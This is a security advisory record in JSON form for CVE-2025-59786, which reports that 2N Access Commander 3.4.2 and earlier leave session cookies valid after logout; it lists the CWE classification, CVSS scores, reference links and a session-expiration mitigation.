2N Access Commander version 3.4.2 and prior improperly invalidates session tokens, allowing multiple session cookies to remain active after logout in web application.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-59786"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-613"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-04T16:16:25Z",
    "severity": "MODERATE"
  },
  "details": "2N Access Commander version 3.4.2 and prior improperly invalidates session tokens, allowing multiple session cookies to remain active after logout in web application.",
  "id": "GHSA-77mj-xgfx-fxp2",
  "modified": "2026-03-05T15:30:35Z",
  "published": "2026-03-04T18:31:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59786"
    },
    {
      "type": "WEB",
      "url": "https://www.2n.com/en-GB/download/cve_2025_59786_acom_3_5_v1pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

Mitigation
Implementation

Set sessions/credentials expiration date.

No CAPEC attack patterns related to this CWE.